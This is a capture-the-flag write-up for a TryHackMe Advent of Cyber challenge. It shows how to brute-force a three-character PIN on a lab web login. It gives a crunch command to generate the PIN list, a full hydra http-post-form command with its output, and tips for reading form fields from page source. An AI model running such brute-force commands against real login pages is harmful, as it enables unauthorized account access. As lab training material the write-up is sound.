Challenge Information
- Advent of Cyber Day 3
- THM link here
Explanation
Basically this is a brute forcing challenge where you need to get the correct pin.
wrong pin result.
To solve this challenge, just create a list of different combination. Since the pin is only 3 digits, we could easily generate it with crunch.
1
2
3
4
5
6
7
8
9
10
crunch 3 3 0123456789ABCDEF -o pin.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096
crunch: 100% completed generating output
After the pin is generated, Use hydra to brute force it.
1
2
3
4
5
6
7
8
9
10
11
12
13
hydra -l '' -P pin.txt -f 10.10.154.129 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-04 16:26:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.154.129:8000/login.php:pin=^PASS^:Access denied
[STATUS] 434.00 tries/min, 434 tries in 00:01h, 3662 to do in 00:09h, 16 active
[STATUS] 438.00 tries/min, 1314 tries in 00:03h, 2782 to do in 00:07h, 16 active
[8000][http-post-form] host: 10.10.154.129 password: 6F5
[STATUS] attack finished for 10.10.154.129 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-04 16:30:46
It is tricky to use Hydra when brute-forcing http as it requies custom input. The input /login.php
is taken from the name of the page that shows the pin and the input pin
can be taken from the source code somewhere the <form method='post
and <input
.
1
2
<form method="post" action="login.php" class="grid grid-cols-3 max-w-lg mx-auto bg-thm-900 p-4 font-mono">
<input type="hidden" name="pin" />
After entering the correct password, it leads to a new page where flag can be retrieved.
Things I learned from the challenge
- Brute-forcing with hydra
- generate password list using crunch